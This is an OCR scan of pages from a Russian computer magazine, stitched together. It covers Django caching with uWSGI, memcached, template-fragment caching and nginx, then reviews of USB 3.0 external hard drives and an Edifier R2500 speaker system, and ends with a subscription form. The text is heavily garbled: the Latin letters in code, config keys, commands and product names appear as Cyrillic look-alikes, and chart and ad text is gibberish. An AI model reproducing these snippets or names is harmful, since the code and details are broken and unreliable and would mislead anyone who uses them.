'ВАСКЕМР' : 'сІіап^о.соге.сасІіе.ЬаскепсІБ. тешсасііесі. 

МешсасІіесІСасІіе' . 

' ЮСАТІОМ ' : [ 

'172.19.26.240:11211' . 

'172.19.26.242:11211'^ 

] 

ь 

ь 



# Пример для БД 

САСНЕ5 = { 

'сІе-РаиІІ: ' : { 

'ВАСКЕN^' : ' сііап^о . соге . сасбе . ЬаскепсІБ . сІЬ . 

ОаіаЬаБеСасІіе ' ^ 

' ІОСАТІОМ ' : ' имя таблицы ' . 

} 

} 



# ссі /ѵаг/ѵ\ДлДл/ 

# сІдап§о-асІтіп.ру 5Ііаг1:ргодес1: ту5І1:е 

2 . Поместить в образованный каталог два файла: 

сI^ап^о.xт1 

<Шл/5§І> 

<50ске1і>127 .0.0.1: 8012</5оске1і> 

<ру1іІіопра1:Іі>/ѵаг/ыѵ\/ы/ту5І1:е/</ру1:Ііопра1:Іі> 

<тосІи1е>сІдап§о_ы5§і</тосІи1е> 

</иы5§і> 

сI^ап^о мз^і.ру 

ітрогі: 05 

05.епѵігоп[ '^^АNСО_5ЕТТINС5_МО^^^Е' ] = '5е1і1:іп§5' 




Методы и бэк-энды кеширования в 0]апдо 



ііпрогі сІдап§о . соге . ІіапсІІегБ .Ы5§і 

арріісаііоп = сІдап§о. соге. ІіапсІІегБ .ы5§і.1лІ56ІНапсІ1ег() 

3 . ЗапуститьиѴѴЗСІ-сервер (опция "-р" определяетколичество 
рабочихпроцессов): 

# иы5§і -р 4 -5 127.0.0.1:8012 

Скриптов автозапуска в комплекте иѴѴЗСІ нет, поэтому послед- 
нюю команду проще всего засунуть куда-нибудь в /ек/гс.іосаі: 

# ѵі /еѣс/гс Лосаі 

ССІ /ѵаг/ыыы/ту5І1:е 

иы5§і -р 4 -5 127.0.0.1:8012 



НАСТРОЙКА КЕШ-БЭК-ЭНДА 



Теперь всё вроде бы настроено и работает, и мы переходим к 
самой интересной и важной части статьи. Кеширование крити- 
чески важно для быстродействия любого динамического сайта, 
вне зависимости от технологий, на которых он построен. Мы 
должны упростить процесс переваривания и отдачи сервером 
динамической составляющей. Есть несколько способов решения 
этой задачи, но здесь всё зависит от специфики веб-сайта. 

Во-первых, можно тупо кешировать все страницы сайта. Это 
самый простой и оченьлегко реализуемый с помощью 0)апдо 
способ. Однако он является и самым неэффективным: любое из- 
менение страницы приведет к промаху мимо кеша и повторной 
загрузке страницы в него. Изменение может быть каким угодно: 
срабатывание счетчика на сайте, появление нового коммента- 
рия, обновление списка популярных статей и разделов. Поэтому 
полное кеширование имеет смысл включать только для более- 
менее статичных сайтов вроде блогов, словарей, энциклопедий 
и т. п. 

Во-вторых, можно кешировать данные, загружаемые из БД. 
Также легко реализуемый, но очень спорный вид оптимизации. 
Он результативен только для тех сайтов, где осуществляется 
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5УМ/АСК 



МНОГО операций чтения из БД и мало операций записи, да и то 
лишь в том случае, если само хранилище кеша работает быстрее 
механизма кеширования базы данных. Другими словами, ке- 
ширование результатов выборки из БД подойдет, опять же, для 
более-менее статичных сайтов, размещенных на сервере, кото- 
рый имеет достаточный объем памяти для нормальной работы 
тетсасЬесІ. 

В-третьих, кешировать можно нечасто изменяемые фрагмен- 
ты шаблонов. Этот метод подойдет практически для любого сай- 
та, он достаточно дешев и, на мой взгляд, наиболее эффективен. 
Однако, в отличие от первых двух, он требует работы напильни- 
ком и не имеет прямого отношения к администрированию как 
таковому. Логикой и архитектурой занимаются программисты. 

Также большое значение имеет выбор хранилища для кеширо- 
ванных данных. 0]апдо предлагает нам четыре варианта: 

• тетсасЬесІ — дорого в плане памяти, но очень эффективно; 

• оперативная память — менее затратно, но и менее эффективно; 

• жесткий диск — очень неэффективно и очень дешево; 

• база данных — болееэффективно, чутьдороже. 

Первые два подойдут для владельцев выделенных серве- 
ров, последние два можно применять на хостинге и недорогих 
ѴРБ'ках. Хотя, конечно, лучше протестировать производитель- 
ность в реальных условиях и выбрать наиболее подходящий 
вариант. 

Теперь о том, как включить кеш-хранилище. Здесь всё просто — 
открываем зеиіпдз.ру проекта и пишем следующее: 

• Локальный шетсасііесі 

САСНЕВАСКЕМР = ' тетсасбесі : //127 . 0. 0 Л : 11211/ ' 

• База данных (как создать таблицу, описано ниже’) 

САСНЕ ВАСКЕМР = ' сІЬ : //имя_таблицы ' 

• Файловая система 

САСНЕ ВА СКЕМР = 'біе : ///пу ть/до/фа йла ' 

• Операт ивная память 

САСНЕВАСКЕМР = 'Іостет:///' 

• Фиктивный кеш (для разработки) 

САСНЕ ВАСКЕМР = 'сіитту:///' 

Во втором случае необходимо предварительно создать таблицу 
в базе данных. Делается это с помощью стандартного тападе.ру: 

• РѴІІІ 10 П тапа^е.рѵ сгеа1:есасІіе1:аЫе имя таблииы 

Любой тип бэк-энда поддерживает следующие аргументы: 

• Лтеоиі — время жизни кешированных данных в секундах (по 
умолчаниюЗОО); 

• тах_еп1гіе5 — максимальное количествозаписей в кеше (по 
умолчаниюЗОО); 

• си11_1'гедиепсу — процентстарыхзаписей, которыеудаляются 
по достижении тах_еп1гіе5 (поумолчаниюЗ, то есть треть всех 
записей). 

Для передачи аргументов используется синтаксис С6І, например: 
САСНЕ_ВАСКЕМР = " Іостет :///?1;ітеои1;=30&тах_еп1;гіе5=400" 



НАИБОЛЕЕ ЭФФЕКТИВНЫЙ МЕТОД 
КЕШИРОВАНИЯ - СОХРАНЕНИЕ 
ТОЛЬКО ИЗБРАННЫХ ЧАСТЕЙ 
СГЕНЕРИРОВАННЫХ ВЕБ-СТРАНИЦ 



ССі діив Мдігта апсі 




І4ГЧѴ 



р№>инжі|і 



Ненагрузочное тестирование иѴѴ56І 



КЕШИРОВАНИЕ ВСЕГО САЙТА И КЕШИРОВАНИЕ 
ЗАПИСЕЙ 



Итак, если ты решил, не сильно заморачиваясь с настройкой и 
шаблонами, добиться некоторой оптимизации, то кеширование 
всех страниц сайта и записей БД — твой выбор. Сразу скажу, что 
их одновременное кеширование не имеет смысла, однако кеши- 
рование страниц и записей по отдельности, как я уже упоминал, 
может дать хороший результат на более или менее статичных 
сайтах. 

Для включения кеширования всего сайта средствами 0)апдо 
достаточно внести всего два изменения в зеиіпдз.ру: 

# Включаем кеширование 

МІРРІЕІЛІАКЕСІА55Е5 = ( 

# Важно разместит ь эту строку в начале 
'сІдап^о.тісІсІІеыаг е.сасІіе.СасІіеМісІсІІеыаге ' ^ 

# Здесь идут все остальные тісісііеіл/аге. . . 
'сііап^о.тісісііеыаге.сасііе. Ре1:сІіРготСасІіеМісІсІ1еыаге' . 

) 

# Указываем "срок годности" кеш а в се кундах 
САСНЕ МІРРІЕІЛІАКЕ $ЕСОМР$= ' 300 ' 

Это всё. Теперь любая сгенерированная из шаблона страница 
будет попадать в кеш. Просто и тупо. Несколько более интел- 
лектуальный способ заключается в использовании кеша для 
хранения результатов выборки в БД. Для его реализации как раз 
и нужен установленный ранее )оЬппу-сасЬе, который использует 
тетсасЬесІ в качестве бэк-энда. Активация осуществляется в три 
шага. Добавляем )оЬппу-сасЬе в список О)апдо-приложений: 

ІМ5ТАІІЕРАРР5 = ( 



'доИппу ' . 

) 

Далее подключаем соответствующий тісісііеѵѵаге: 

МІРРІЕІЛІАКЕСІА55Е5 = ( 

'доііппу.тісісііеыаге. Іоса151:огеС1еагМісІсІ1еыаге' ^ 
' доііппу . тісісііеыаге .^иегуСасI^еМісIсI1еыаге ' ^ 
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Испытание нагрузкой 



Затем указываем в качестве кеш-бэк-энда тетсасЬесІ и 
префикс для его ключей (чтобы избежать конфликтов с другими 
записями в тетсасЬесІ): 

САСНЕВАСКЕМР = 

' ^^^бдпу__. ЬаскеМз .тетс^^^ 

ЗОНММУ_МІРРІЕ1лІАКЕ_КЕУ_РКЕРІХ= ' іс_Іі05^_сот ' 

Всё, наслаждаемся результатом! 



КЕШИРОВАНИЕ ЧАСТЕЙ ШАБЛОНОВ 



Теперь рассмотрим наиболее правильный и эффективный метод 
кеширования, который заключается в сохранении только из- 
бранных частей сгенерированных веб-страниц. С его помощью мы 
можем сделать так, чтобы при обращении к веб-серверу заново 
генерировались только те элементы страницы, которые реально 
часто меняются, а такие элементы, как хидер, футер, меню сайта, 
и многие другие «долгоживущие» элементы страницы загружа- 
лись из кеша. 

Основной профит этого метода в его чрезвычайной эффек- 
тивности, а также нетребовательности к ресурсам машины. 

Даже если хранить кеш в базе данных или в обычном файле, 
скорость отдачи кеша по определению будет выше скорости 
генерирования указанных частей шаблона и выборки из базы 
данных. В то же время этот метод не так просто применить, как 
предыдущие два: для этого требуется понимать структуру сайта 
и в основных чертах знать, как работает система шаблонов 
0]'апдо, что относится больше к веб-девелопингу, чем к тематике 
рубрики. Как бы там ни было, не рассказать об этом типе кеши- 
рования нельзя, поэтому приступим к его рассмотрению :). Для 
инструктирования 0]'апдо о помещении какого-либо блока сайта 
в кеш предусмотрен шаблонный тег с одноименным именем 
сасЬе, принимающий два обязательных аргумента: время жизни 



КЕШИРОВАНИЕ СРЕДСТВАМИ М6ІМХ 



Хоть это и малоэффективно, но кеширование можно настроить и 
с помощью пдіпх. Для этого можно использовать директивы ргоху_ 
зіоге и 1гу_Л1е5: 

1оса1;іоп / { 

Г 00 І: /ѵаг/ыыы/ ; 

1:гу_1і1е5 /сасІіе/$игі @5І:ога§е; 

} 

Іосаіііоп @5І:ога^е { 

ргоху_ра55 Іі1;1;р://ЬаскепсІ; 
ргоху_5е1;_ІіеасІег Но5І; $Іі05І;; 

ргохѵ 5І:оге оп; 

ргоху_5І:оге_ассе55 изегігы §гоир:гы а11:г; 
ргоху_1;етр_ра1:Іі /ѵаг/ыыы/сасііе/; 

Г 00 І: /ѵаг/ыыы/сасііе/: 

} 

В результате все запрашиваемые файлы будут помещаться 
в каталог /ѵаг/ѵѵѵѵѵѵ/сасИе (лучше примонтировать к нему Ітр^з, 
чтобы файлы хранились в оперативной памяти), однако чистить его 
придется вручную (удаление файлов старше 10 минут): 

$ ссі /ѵаг/ыыы/сасііе 
$ бпсі ./ -Туре -Р -атіп +10 -сІеІеТе 

Также можно поместить эти команды в сгоп. 



івірагі пв 

□5.Епѵ1гоп['^^НNIЮ_^ЕТТ1НIз5_п]Е]и^Е'1 = 'аЕПіпдз* 
іцрогі й^й^>90.со^е.Ьап(11е^5.Iіі5д1 

йрріісвиоп = ЕІ^апдо,согѳ>ЬогкПеге.иед1 кН5@ІНвпсІ1ег(] 



127.В.ВЛ [ВВ12 

/Ьоліе/ ^ Іц/кюгіс/э ие/Ыод/ 



Конфиг иѴѴЗСІ для 0)апдо 

кеша в секундах и имя кеш-блока, которое может быть произ- 
вольным. В дефолтной библиотеке тегов его нет, поэтому перед 
использованием этого тега следует подключить одноименную 
библиотеку с помощью директивы ІоасІ (размещаем соответству- 
ющую строку в начале нужных шаблонов): 

{% ІоасІ сасііе %} 

Типичный пример использования сасЬе может выглядеть сле- 
дующим образом: 

{% Ыоск Ііеасіег %} 

{% сасііе 5000 Ііеасіег-сасііе %} 

{% Ыоск Іо^о %} 

{% епсІЫоск %} 

{% Ыоск тепи %} 

{% епсІЫоск %} 

{% епсісасііе %} 

{% епсІЫоск %} 

Здесь всё просто. Есть блок Ьеасіег и два вложенных блока Іодо 
и тепи, обрамленные блоком сасЬе. Это значит, что сгенериро- 
ванные фрагменты страницы из блоков Іодо и тепи попадают в 
кеш, где живут ровно 5000 секунд, после чего генерируются снова. 
В такие же блоки сасЬе можно помещать и другие элементы веб- 
страниц, варьируя время жизни кеша в зависимости от предпола- 
гаемого времени их жизни. 

Чтобы активировать кеширование для блоков, содержимое 
которых меняется предсказуемым образом с учетом каких-либо 
данных (например, различные сайдбары для зарегистрированных 
юзеров и анонимусов, страницы одной статьи и т. д.), следуетука- 
зать переменные, содержащие эти данные, в качестве аргументов. 
Например: 

{% Ыоск БІсІеЬаг %} 

{% сасііе 500 БІсІеЬаг-сасІіе гедиеБІ: . ОБег. иБегпате %} 

{% епсісасііе %} 

{% епсІЫоск %} 

В результате система кеширования будет создавать индиви- 
дуальные записи в кеше для разных пользователей на основе их 
ников. 



выводы 



Создавать высокопроизводительные О)апдо-проекты не так слож- 
но, как может показаться на первый взгляд. Для этого требуется 
только вооружиться правильными инструментами и выбрать под- 
ходящую стратегию кеширования данных. Всё остальное за тебя 
сделает система. 
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Александр Михеев 






ОТ <<ВИНТА»! 



ТЕСТИРОВАНИЕ ВНЕШНИХ 
ЖЕСТКИХ ДИСКОВ С 05В 3.0 



Когда надо перебросить с одного компьютера на другой пару 
гигабайт, в ход идут диски и флешки. Когда-то для обмена файлами 
вообще хватало дискет (а в некоторых государственных орга- 
низациях они используются до сих пор). В наши дни эту задачу 
сильно облегчает интернет, но напрямую передавать через него 
очень большие объемы данных не так-то просто. Можно, конечно, 
особо не заморачиваться, а просто достать из системного блока 
винчестер и прямо вместе с ним направиться по нужному адре- 
су (так в свое время делали все трушные техноманьяки — прим, 
редактора). Но, если эту процедуру проделывать слишком часто, 
она начинает сильно утомлять, причем не столько хозяина, сколько 
накопитель. Поэтому лучшим решением в некоторых ситуациях 
станут внешние жесткие диски, компактные, а самое главное, та- 
кие же простые в обращении, как и флеш-накопители. Сегодня мы 
сравним 6 различных мобильных запоминающих устройств. 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Тестирование внешних жестких дисков проводилось в три этапа. 
На первом с помощью бенчмарка НО Типе Рго мы проверяли, на- 
сколько быстро НОО справляются с последовательным чтением 
и записью. На графике ты можешь увидеть не только средние, 
но и минимальные, а также максимальные значения. В конце мы 
воспользовались подтестом под лаконичным и ясным названием 
НОО из набора РСМагк Ѵапіаде. Он «терзал» накопители, за- 
ставляя их выполнять операции, с которыми любой жесткий диск 
ежедневно сталкивается в обычной жизни. Как общий результат 
в «попугаях», так и промежуточные данные в Мб/с ты, опять же, 
сможешь лицезреть и сравнить между собой на графиках в самом 
конце статьи. Несомненно, стоило бы устроить и краш-тест для 
пущей уверенности в том или ином девайсе, но, к сожалению, при- 
шлось довольствоваться бенчмарками. 
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От «винта»! 



АОАТАМН13 



ткрываеттестирование стильным внешним жестким 
диск от АОАТА. В нашу лабораторию попал черный АОАТА 
NN13 объемом 750 Гб, всего же в линейке четыре диска: 
в черном корпусе на 500/750 Гб и в белом такого же объема. Чтобы 
накопитель прослужил подольше, производитель облачил его 
в алюминий — и прочность выше, чем у пластиковых внешних N00, 
и смотрится достаточно солидно. N3 корпусе никаких кнопок или 
иных приспособлений, только индикатор активности да порт Міпі 
05В 3.0. 

В работе показал себя очень неплохо — тихо, без чрезмерной 
вибрации он на ура справился со всеми бенчмарками, которые 
выпали на его долю. Что касается комплектации, то тут особого 
богатства ждать не стоит: в картонной упаковке ты отыщешь лишь 
кабель П5В 3.0 да маленькую брошюрку с подсказками по исполь- 
зованию. 

К АОАТА NN13 также прилагается и бесплатный софт, который 
можно скачать после регистрации на сайте. С помощью одной 
из предлагаемых программ ты можешь сделать свой N00 устано- 
вочным (если утебя есть ОѴО с ѴѴіпсІоѵѵз 7), вторая позволяет легко 
и просто производить бэкап выбранных файлов. 




5ЕА6АТЕ 

5ТАА1500100 

«внешником» от Веадаіе не всё настолько же просто. Да, 
с виду это всё тот же спичечный коробок-переросток в ти- 
пичном черном глянцевом корпусе, но вот от собратьев его 
кое-что отличает. Всё дело в том, что устройства линейки боРІех 
используют в качестве интерфейса для передачи данных модифи- 
цированный 5АТА-порт, несовместимый с обычным 5АТА. К нему 
уже подключаются сменные модули-контроллеры интерфейсов, 
таких как, например, 115В второй или третей ревизии, еВАТА или 
РігеѴѴіге 800. В комплекте с Веадаіе 5ТАА1500100 поставляет- 
ся модуль с 115В 3.0. Остальные модули, если они тебе нужны, 
ты можешь приобрести отдельно — на свой вкус. Сам внешний 
диск Веадаіе 5ТАА1500100 оказался тяжелее и толще всех других 
участвовавших в нашем сравнительном тестировании устройств. 
Это неудивительно, ведь он может вместить целых 1,5 Тб полезной 
или не очень информации. Стоит «винт» соответственно, однако 
среди прочих участников теста он обладает самой низкой ценой 
за условный гигабайт. 
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РЕКким 



5ІІІС0М РОѴѴЕК 
5Р7506ВРНІ)52053и 



|В 



торой диск с шильдиком 5ІІІСОП Роѵѵег, принявший участие 
в тестировании. Внешний вид НОВ стал немного агрессивнее. 
Фиолетовый корпус смотрится неплохо среди моря черных 
«внешников». Если продолжать аналогию с авто, синий индикатор 
активности находится на «капоте». Порт Міпі 115В 3.0 здесь также рас- 
положен на боку, поэтому придется вытаскивать диск из прилагаемого 
чехла, чтобы подключить кабель. К нам в лабораторию пришла модель 
объемом 750 Гб, но в серию входят еще три вариации с объемом от 500 
до 1000 Гб — самые ходовые ныне «размеры». Стандартная комплек- 
тация здесь немного дополнена: кроме кабеля, есть и чехол, такой же 
незамысловатый, как и у Вііісоп Роѵѵег 5Р6406ВРН051053М. При про- 
хождении полосы препятствий-бенчмарков диск показал себя очень 
достойно: не может не радовать, что красота девайса не является 
его единственным плюсом. Кустройству прилагается такой же софт, 
как у младшей модели, но, мы думаем, ты уже и сам догадываешься, 
каковы его основные функции. 




► 




ТРАЫ5СЕЫ0 Т51Т5^25НЗР 




аконец, мы дошли до «внешника», в некоторой степени 
защищенного от пагубного влияния внешней среды. Напри- 
мер, от кривых рук, всё время норовящих уронить устройство 
на твердую поверхность. 

ТгапзсепсІ производит и имиджевые «винты», но всё же более 
известна именно по моделям с пластиковым корпусом, оснащенным 
резиновым покрытием. Ктомуже на корпусе присутствует та самая 
кнопка для ленивых, выполняющая автоматический бэкап данных. 
Далее всё более тривиально: интерфейс передачи данных 115В 3.0, 
в комплект входят кабель и руководство пользователя. Забыли упомя- 
нуть про дизайн — нам он чем-то напомнил уютный бабушкин свитер 
спокойного серого и фиолетового тонов. Правда, бабушкин свитер 
не может хранить 1 Тб данных, как ТгапзсепсІ Т51Т5325НЗР. К слову, 
есть модели с меньшим объемом (500 или 750 Гб), которые, соответ- 
ственно, стоят дешевле. 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Емкость: 

Формфактор: 

Интерфейс: 

Размеры: 

Масса: 




750 Гб 
2,5" 

извз.о 

77 X 16 X 118 мм 
165 г 



Зеадаіе 5ТАА1 500100 



5ІІІСОП Роѵѵег 
5Р7500ВРН- 
052053и 



1,5Тб 

2,5" 

УБВЗ.О 

89 X 120 X 22 мм 
280 г 



750 Гб 
2,5" 

У5В3.0 

80 X 21 X 142 мм 
160 г 
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ѴЕКВАТІМ 53035 



ще один яркий диск в нашей тестовой лаборатории — 
кислотно-розовый ѴегЬаІіт 53035. По правде говоря, вся 
линейка Зіоге'п'Со сделана для весельчаков. В ней присут- 
ствуют модели зеленого, лазурного, желтого, оранжевого и фиолето- 
вого цвета. Все они очень яркие, хоть развешивай их на елке вместо 
новогодних игрушек. Обидно, что такой красивый корпус ѴегЬаІіт 
53035 сделан из пластика, пускай даже это характерно для большин- 
ства внешних НОО. Всё, что ты сможешь найти снаружи, — это синий 
индикатор активности и порт Міпі 05В 3.0. Кроме внешнего вида, 
«винт» также может похвастаться завидной вместительностью в 1 Тб, 
благодаря чему с собой в дорогу можно взять ну очень много всего. 

И конечно, в первую очередь нас порадовала производительность 
— ѴегЬаІіт 53035 единственный смог удержаться в тройке лидеров 
на протяжении всех наших тестов. 

Также необходимо отметить софт: в комплекте предоставляется 
несколько утилит от Мего, а также программа бгееп Вииоп, которая 
может показаться очень полезной владельцам ноутбуков. С ее по- 
мощью можно самостоятельно настраивать время, спустя которое 
внешний жесткий диск будет уходить в ждущий режим. Но если ты 
не доверяешь автоматике, можешь дважды щелкнуть по значку про- 
граммы, и накопитель тут же «заснет». 




ш — ^ — К* 

ТгапзсепсІ ѴегЬаІіт 53035 

ТБ1ТБ^25НЗР 

1 Тб 1 Тб 1 Тб 

2,5" 2,5" 2,5" 

извз.о извз.о извз.о 

81х22х131мм 82х20х127мм 83х18х110мм 

256 г 185 г 200 г 




^ЕЗТЕРМ 0І6ІТАІ 
Ѵ^ОВАСХООЮВВК 



авершаеттестирование продукт компании, которая более 
чем известна на рынке жестких дисков. Линейка Му Раззрогі 
ЕззепЛаІ 5Е тоже включает в себя накопители разных, но всё 
же более консервативных цветов: черного, серого, голубого и крас- 
ного. Корпус устройства имеет обтекаемую форму, благодаря чему 
его, кстати, удобнее класть в карман. Никаких лишних наворотов мы 
не нашли: на корпусе всё так же имеется лишь логотип компании - 
производителя, порт Міпі 115В 3.0 да маленький белый индикатор 
работы. Среди накопителей серии Му Раззрогі ЕззепЛаІ 5Е есть как 
«терабайтники», так и устройства на 750 Гб. Полуторатерабайтная 
«высота» крупнейшему производителю жестких дисков по каким-то 
причинам пока не покорилась, правда, речь идеттолько о внешних 
2,5-ДЮЙМОВЫХ НОО. Но и 1000 Гб — это немало, тем более для «внеш- 
ника». По крайней мере, для создания резервных копий данных такого 
объема хватит за глаза. А упростит этот процесс специальный софт, 
который прилагается ко всем «внешникам» этой линейки. Не обо- 
шлось и без минусов, к которым относится довольно маркий корпус 
и не самые лучшие показатели производительности. 




ѴѴезІегп 

ОідіІаІѴѴОВАСХ- 

ООЮВВК 



АѴѴАР05 

После всей болтовни, всех сравнений, тестов 
и прочего мы вплотную подходим к награждению. 
Тебе еще предстоит познакомиться с подробными 
описаниями участников теста, но карты, то есть 
результаты, мы раскроем сразу. Итак, «Выбором 
редакции», безусловно, стал шустрый и вмести- 
тельный ѴегЬаІіт 53035. Приз «Лучшая покупка», 
отмечающий нечто вроде золотой середины, по- 
лучает 5ІІІСОП Роѵѵег 5Р7506ВРН0520531І. ^ 
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РЕКким 



РСМАРК ѴАМТАСЕ, БАЛЛЫ 



АОАТАМН13 750 Гбайт 

Зеадаіе 5ТАА1500100 

5ІІІС0П Роѵѵег 
5Р7506ВРН052053У 

Тгап5сепбТ51Т5325НЗР 

ѴегЬаІіт 53035 

ѴѴезІегп Оідііаі 
ѴѴОВАСХ0010ВВК 







Результаты РСМагк Ѵапіаде трудно трактовать двусмысленно 



ТЕМПЕРАТУРА, ®С 

АОАТАМН13 750 Гбайт 

Зеадаіе 5ТАА1500100 

5ІІІСОП Роѵѵег 
5Р7506ВРНВ52053У 

Тгапзсепб Т51Т5325НЗР 

ѴегЬаОт 53035 

ѴѴезІегп Відііаі 
ѴѴОВАСХ0010ВВК 




о 10 15 20 25 30 35 40 45 



Температура у всех испытуемых была в норме даже после прохождения всех 
тестов, если, конечно, верить показаниям встроенных температурных датчиков 



РСМАККѴАНТАСЕ, МБАЙТ/С 

АОАТА МН13 750 Гбайт 

Зеадаіе 5ТАА1500100 

5ІІІСОП Роѵѵег 
5Р7506ВРНО52053У 

ТгапзсепсІ Т51Т5325НЗР 

ѴегЬабпп 53035 

ѴѴезІегп Оідііаі 
ѴѴОВАСХ0010ВВК 

■ \Л/іпсІоѵѵ5 Ое^епсіег 

■ батіпд 

■ Ітргоііпд Рісіигез 1;о ѴѴіпсІоѵѵз рііоіо баііегу 

■ Ѵ7ІПСІОѴѴЗ Ѵізіа зіагіир 

■ Ѵісіео есііііпд изіпд Ѵѵіпсіоѵѵз Моѵіе Магкеі 

■ ѴѴІПСІОѴѴЗ Месііа Сепіег 

■ Асісііпд тизіс Іо ѴѴІпсіоѵѵз Месііа РІауег 
Арріісаііоп Іоасііпд 







о 10 20 30 40 50 60 



Теперь подробнее: сравним результаты каждого из подтестов 



70 80 



НО ТОНЕ РКО (ІѴКІТЕІ, МБАЙТ/С 



АОАТА МН 13 750 Гбайт 

Зеадаіе 5ТАА1500100 

5ІІІСОП Роѵѵег 
5Р7506ВРНО52053и 

ТгапзсепсІ Т51Т5325НЗР 

ѴегЬаІіпп 53035 

ѴѴезІегп Оідііаі 
ѴѴОВАСХ0010ВВК 



■ НО Типе Рго (ѴѴгіІе), Мбайт/с мин. 

■ НО Типе Рго (ѴѴгіІе), Мбайт/с макс. 

■ НО Типе Рго (ѴѴгіІе), Мбайт/с сред. 




Если какой-то из участников не отличился в скорости чтения, то и с записью 
дело обстоит не лучше. И наоборот 



но ТОНЕ РКО (ЯЕАОІ, МБАЙТ/С 



АОАТА МН13 750 Гбайт 

Зеадаіе 5ТАА1500100 

5ІІІСОП Роѵѵег 
5Р7506ВРНО52053и 

ТгапзсепсІ Т51Т5325НЗР 

ѴегЬаІіт 53035 

ѴѴезІегп Оідііаі 
ѴѴОВАСХ0010ВВК 

■ НО Типе Рго (Кеаб), Мбайт/с мин. 

■ НО Типе Рго (Кеаб), Мбайт/с макс. 

■ НО Типе Рго (КеасІ), Мбайт/с сред. 




Три скорости последовательного чтения: минимальная, максимальная и средняя 
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ѴАІВАМО ЗI^VЕЙЗТ0NЕ МДиОЙѴ САЙТНАСЕ ѴАІЕМСІА МАХ вйООКІХичОв ВТОШ 



МиОЕІіО- НѴЙЕЙ ЗІІѴЕЙ 



ШѴАОЕ ■ СЮ58 вІЛСК 6РОК&& 




ІНОУ зао ІМАЙОО $ЕРАН(з 201 [}ЁЙ СА{}VVЁ^^ ^0Г10ЙINА ІАЙАМА БМЁТТЕЙТОН 




КОТАЙѴ ГОКОЕО VVНЕЕ^З НийвЕІЙСЙІШНЁ ІМТЁЙИАООЗ ЙЕ СОМІ40ТОМ VVI^^ОVV ЗТНІР 



ѴізіІ оиг жоЬаііі? Іо ѵшѵ/ іЬе готр^иіе \тс оІ Т5ѴѴ ѴѴІіЕ?о<а 



Т8ѴѴ і& сІ^ісаЕеі:! Ій Ьёіп^ ЕЬе нйгІ(І’& ргйтіиггі ргйѵіі^Ёг оі 
ѵѵЬзеІ арріісаііопз ап(^ Ьаз глоге опе^ріеое зіаддегѳсі игііееі зігѳз 
^Иап апу оіЬБГжІісеІ ЬгапсІ іп іНе ѵѵогііі. 





РЕКі^им 



Сергей Плотников 





Общая выходная мощность: РМ5 25 Вт + 25 Вт 
(ТНО + М = 10%) 

Сигнал-шум: > 85 дБА 
Искажения: < 0,05 % 

Частотная характеристика: 20 Гц ~ 20 кГц 
Входная чувствительность: 700 ± 100 мВ 
Управление: громкость, выбор входа, РМ- 
настройки, навигация 
Динамик НЧ: 5,75 (148 мм), магнитное 
экранирование, 6 Ом, портФИ 
Динамик ВЧ: 1 (25 мм), твитеры с шелковым 
куполом, магнитное экранирование, 6 Ом 
Размеры: активная колонка: 318 х 191 х 284 мм; 
пассивная колонка: 318 х 186 х 271 мм 
Тип входа: два РСА-входа (РСА-РСА и РСА для 
входа АОХ), РМ-радио, 50-карта, ІІЗВ-вход 
Масса: 11 кг 







МІГі 


ш 



ЕОІПЕЯ Я2500 



ОБЗОР УНИВЕРСАЛЬНОЙ АКТИВНОЙ СТЕРЕОСИСТЕМЫ 2.0 



Как утверждает на своем сайте компания 
ЕсІіПег, модель активной стереосистемы 2.0 
Р2500 (или Зіисііо 5) идеально подходит для 
дома, студии и офиса. И с этим, пожалуй, тя- 
жело не согласиться, разве что для офисного 
клерка колонки слегка великоваты. Но, с дру- 
гой стороны, кто мешаеттебе стать начальни- 
ком и обзавестись собственным кабинетом? 
Да, ЕсІіЛег Р2500 однозначно облагородит 
любую комнату и отлично впишется в любой 
интерьер. А всё из-за строгого, но привле- 
кательного внешнего вида. Акустическая 
система ЕсІіПег Р2500 изготовлена из МОР 
черного цвета. Остальные элементы также 
выполнены в сходной цветовой палитре. 
Динамики прикрыты полупрозрачной тканью, 
лишь 5,75-ДЮЙМОВЫЙ НЧ-динамик выделяется 
серебристо-белым цветом. 

Чуть не забыли упомянуть о габаритах устрой- 
ства. Для того чтобы разместить ЕсІіПег Р2500 
на столе, придется расчистить достаточно 
много свободного пространства. Идеаль- 
ным решением станет установка колонок на 
специальные подставки. Спрятать же такую 



акустику с глаз долой будет настоящим пре- 
ступлением. 

Сбоку на одной из колонок ЕсІіЛег Р2500 нахо- 
дится цифровой модуль управления. Он позво- 
ляет менять параметры акустической системы 
(выбор входа, регулировка громкости, переме- 
щение по записям и настройка РМ-станций), 
а также подключать накопители с музыкаль- 
ными файлами к (^5В-порту и 50-слоту. ЕсІіЛег 
Р2500 поддерживает форматы МРЗ и ѴѴМА. 
Сами разъемы спрятаны в отодвигающемся 
«кармашке». Удобно и практично. 

Подключить акустику к источнику не со- 
ставляет проблем. Стереосистема оснащена 
двумя РСА-входами (РСА-РСА и РСА для А(ЗХ), 
а также входом для РМ-радио. В итоге ЕсІіЛег 
Р2500 можно подготовить к работе за считан- 
ные секунды после распаковки. 

Активная стереосистема имеет суммарную 
мощность 50 Вт, которая достигается благо- 
даря паре дюймовых ВЧ-динамиков и паре 
5,75-ДЮЙМОВЫХ НЧ-динамиков. Все динамики 
характеризуются сопротивлением 6 Ом и име- 
ют магнитное экранирование. 



выводы 



Поговорим о звуке, точнее, о его качестве. 

На наш взгляд, стереосистема ЕсІіЛег Р2500 
является идеальным решением для прослу- 
шивания музыки. Акустика просто создана 
для этого! В общем, низкие и высокие частоты 
звучат довольно ровно. Завалов мы не за- 
метили. При этом любая композиция вос- 
производится весьма и весьма объемно. Если 
говорить более конкретно, то ЕсІіЛег Р2500 
отлично справляется с большинством жанров. 
И роковые рифы, и классика, и «электронная» 
музыка — композиции звучат без искажений. 
Стереосистема неплохо проявила себя в играх 
и фильмах. Но для подобного рода развлече- 
ний идеальным решением, на наш взгляд, всё 
же являются акустические системы формата 
2.1 и 5.1. Другое дело, что их использование в 
домашних условиях и тем более в офисных и 
студийных помещениях не всегда оправданно. 
Зато такие, как ЕсІіЛег Р2500, являются опти- 
мальным выбором! ^ 
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Подписка 



ГОДОВАЯ 
ЭКОНОМИЯ 

500 руб 



1. Разборчиво заполни подписной купон и кви- 
танцию, вырезав их из журнала, сделав ксе- 
рокопию или распечатав с сайта зЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
